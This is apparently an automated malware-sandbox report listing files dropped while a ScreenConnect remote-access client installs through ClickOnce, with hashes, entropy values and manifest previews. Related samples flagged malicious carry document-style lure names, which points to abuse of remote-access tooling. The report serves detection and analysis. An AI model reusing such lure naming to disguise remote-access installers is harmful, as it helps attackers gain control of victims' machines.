                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:XIEfBeF7lWuWWuLg0e6S+9owQX7g27mL438ciUcVM8Aw+9t6hIYX:XJ3uWWmeV+WwQXlmL4MckVM8Aw+OhIYX
                                                                                                                                                                                                                                                                  MD5:06B4EDDC7E4423E0A311EAF7798E8C18
                                                                                                                                                                                                                                                                  SHA1:D06E37356BD4AE50056FC650550A3CFE5F9E41B3
                                                                                                                                                                                                                                                                  SHA-256:0DBEB7DAA0C7F70D594F5CF294D3C3EB88E4C0F25D7174077F511C43F4D90A41
                                                                                                                                                                                                                                                                  SHA-512:921BD5BD362F5CF609D43230270789516BBA10911D0E4EB56FB2A6E3A59B5AB365F2E4C2EEC10250836C6DB64B63584AB5DBF357CF23AA300176D7A09EC63C4A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5260
                                                                                                                                                                                                                                                                  Entropy (8bit):4.212169089585271
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:2Nq6R84TeV+Ww7mk9O43jYHlIgBXlnzkay3mhhwnjIbm:iR84UJC9tUHlXBXtIESjd
                                                                                                                                                                                                                                                                  MD5:877C9052B118D2F154A633D3F00759FF
                                                                                                                                                                                                                                                                  SHA1:2A005EADA6B9C8B8CB033FB95BB01316BFF08787
                                                                                                                                                                                                                                                                  SHA-256:571BF9FBFD2000F7B051A93B5B5724E53B4E1D58273D5699AE0D711AAC892F11
                                                                                                                                                                                                                                                                  SHA-512:1C714509A457D494CA5068093E379722877F5CCC1CE9484EE4FA9AC080A0A34976614932D782FE3DE9A553B6B79287095658AD1F46F09CBF47BEE4DC213B3FA2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):6588
                                                                                                                                                                                                                                                                  Entropy (8bit):4.114943993628971
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:ZMmx9eV+WwwU8WpZ2LRheuMl2UfdVaMsoksJqi/D5:dxCJwpZ2LRhyl5dVzGw75
                                                                                                                                                                                                                                                                  MD5:7AD30FB645AAC6571566C4504E71C836
                                                                                                                                                                                                                                                                  SHA1:67666FB4A2B78262A6721B8491A7F1AA1CDC0208
                                                                                                                                                                                                                                                                  SHA-256:ED5B7DC7B05F91743B32CCE803C805751FF22E3C039E776FDF3E70E5130E6106
                                                                                                                                                                                                                                                                  SHA-512:0195CA68931AC579A94EF694EB342E20F12FD982CDFF6AFC0D7F6486EA49B78FA57F2D5ACDD89F3F5C2B35F1603A22C1C4AB0C11CC2829931EA8239BE34492FB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3032
                                                                                                                                                                                                                                                                  Entropy (8bit):4.873270947085789
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:0RMQScRgFe6S+9oww7g47BI7EuqSGzhvVDvxLi0nwbb:aXScEeV+Wwwni7npGjD5LvnEb
                                                                                                                                                                                                                                                                  MD5:9B7AF32FAFD09158C2C0A3D44898AB68
                                                                                                                                                                                                                                                                  SHA1:ED56F417ACC794E55BD9B8424D7D49A0FB9006D4
                                                                                                                                                                                                                                                                  SHA-256:957A8647E1C2388DD78F4D50AA091EF26FC22B19FB70BB66C48AE0ADAB1D1264
                                                                                                                                                                                                                                                                  SHA-512:E1D66F81DDFE70549464E87FFA5E71CB455D206708F7ADA11CE4C2B1245D2AD1CFE184B6BAA6E687B2818A8601BBA597295A49BEDE3BDB35929E42A8B6EF7BA6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):14612
                                                                                                                                                                                                                                                                  Entropy (8bit):5.714277081748387
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:LWh4+In9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:LWA9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                                                                                                                  MD5:60A0F82E8B95175C12A8EEBEBBE27DBF
                                                                                                                                                                                                                                                                  SHA1:990A96ECDA8822D577E5283DF95FC0A9AD38B2A3
                                                                                                                                                                                                                                                                  SHA-256:FC28D6A4B187E635B7438C2CE9CB64257FC8D843187AAF76E015F1DB453F4100
                                                                                                                                                                                                                                                                  SHA-512:66CEF0946F25E515811844734A1B51079ED55D430715F982DE8BEC9A7FEA839FF6758D91AD3CF49AA6A53EF467CCF72CDD13788E82E7F0DE0238B1D784FECE17
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4428
                                                                                                                                                                                                                                                                  Entropy (8bit):4.172510408991975
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:hQKXCD5v+dgre6S+9ow87gFW75uv6ThVBHJu2/qcU5jUWkoDprOaJCf:hvXUeV+Ww8U45u0xpu6UuWkoNOrf
                                                                                                                                                                                                                                                                  MD5:9BB6FC7B18D50BB8F732022157E06F84
                                                                                                                                                                                                                                                                  SHA1:926C999AE5C6CD4D75DEFA1A1B601AFE3B10D9A8
                                                                                                                                                                                                                                                                  SHA-256:EB07B32D7EFB09887D40828FE8F09B387107199CFA9CE1C3F6A9E5A093BCE2C3
                                                                                                                                                                                                                                                                  SHA-512:5DB7E89404E35E101556B4C31879F36AFBF103ECEFC0901A5DF34D2BEBE0363C488EB49EF9E046A6456C254B688EF1238B7C377E12C376E4E9D5C66E40FE2B0D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
